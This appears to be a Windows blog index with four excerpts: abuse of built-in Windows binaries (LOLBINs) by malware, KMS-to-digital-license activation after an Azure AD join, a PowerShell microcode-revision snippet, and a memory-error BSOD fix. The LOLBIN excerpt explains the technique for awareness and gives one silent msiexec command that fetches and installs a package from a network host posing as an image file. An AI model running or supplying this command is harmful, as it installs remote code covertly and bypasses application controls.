Windows

Many types of malware and remote access trojans (RAT) today now use built-in Windows binaries to stage and infect computers. Programs commonly used in such attacks are powershell.exe, regsvr32, rundll32, certreq.exe, certutil.exe and mshta.exe. Living of the land binaries (LOLBINs) bypass protections such as AppLocker since they reside in the c:\Windows folder and/or are codesigned by Microsoft. One example is msiexec /q /i http://192.168.100.3/tmp/cmd.png A great overview of how built-in binaries can be “abused” to download or execute code can be found at the LOLBAS project. ...

At work we are moving everything to Microsoft 365 and Azure AD and removing our on-premises environment. One of the issue we encountered was that when we removed the computer from the domain and joined Azure AD, Windows was still activated using our KMS host. In order to convert the computer to use step-up activation (digital license) we had to install the product key that came with the machine (OEM) and then it would automatically change it to digital license subscription. ...

A small powershell snippet to show what CPU microcode revision is running and what microcode revision the BIOS provides. $registrypath = "Registry::HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\" $processor = (Get-ItemProperty -Path $registrypath )."ProcessorNameString" $biosMicrocode = (Get-ItemProperty -Path $registrypath )."Previous Update Revision" $runningMicrocode = (Get-ItemProperty -Path $registrypath )."Update Revision" # Convert to string and remove leading zeros $biosMicrocodeInHex = (-join ( $biosMicrocode[0..4] | foreach { $_.ToString("X2") } )).TrimStart('0') $runningMicrocodeInHex = (-join ( $runningMicrocode[0..4] | foreach { $_.ToString("X2") } )).TrimStart('0') Write-Host "CPU: $processor" Write-Host "BIOS microcode revision: 0x$biosMicrocodeInHex" Write-Host "Current microcode revision: 0x$runningMicrocodeInHex" Example output: ...

Update: Following guide might not work since Predictive Failure Analysis (PFA) memory settingsare not working in Windows 10 2004 and 20H2 releases. See discussion here. I recently experienced random MEMORY_MANAGEMENT BSOD on my personal computer. When consulting Microsoft Dev Center for the error code it indicated a issue with the RAM. The computer is 6 years old and only has 8 GB of RAM (two sticks) I’m not about to spend money to replace the RAM. ...